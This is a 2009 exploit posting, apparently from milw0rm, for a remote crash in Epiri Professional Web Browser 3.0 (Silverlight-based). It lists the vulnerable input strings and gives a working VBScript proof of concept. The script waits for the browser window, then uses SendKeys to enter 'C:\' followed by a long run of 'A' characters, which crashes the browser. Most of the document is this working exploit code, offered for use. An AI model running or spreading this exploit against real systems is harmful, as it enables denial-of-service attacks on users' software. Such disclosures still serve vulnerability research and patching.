1 ’ Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
2
3 ’ Vendor: Horizon
4 ’ Product Web Page: http://www.horizonum.com/
5 ’ Current Version: 3.0.0.00
6 ’ Notiz: Microsoft Silverlight
7 ’ Vulnerable Mode: Browse Internet
8 ’ Tested On Microsoft Windows XP Professional SP3 (En)
9
10 ’ Vulnerable strings:
11
12 ’ file://
13 ’ C::
14 ’ C:\AAAA...AAAA [257]
15 ’
16
17 ’ Vulnerability Discovered By Gjoko ’LiquidWorm’ Krstic
18 ’ liquidworm gmail com
19 ’ http://www.zeroscience.org/
20 ’ 28.07.2009
21
22
23 ’ Working PoC: http://zeroscience.org/codes/epiri_crash.vbs
24
25 Dim crash
26
27 Set crash = CreateObject("WScript.Shell")
28
29 With crash
30
31 Do Until Success = True
32
33 Success = crash.AppActivate("Epiri Professional 3.0")
34
35 Loop
36
37 ’.SendKeys "file://"
38 ’.SendKeys "C::"
39 .SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
40
41 .SendKeys "~" ’Return
42
43 End With
44
45 Wscript.Quit
46
47 # milw0rm.com [2009−07−30]
Page 1/1
Epiri Professional Web Browser 3.0 Remote Crash Exploit
LiquidWorm
07/30/2009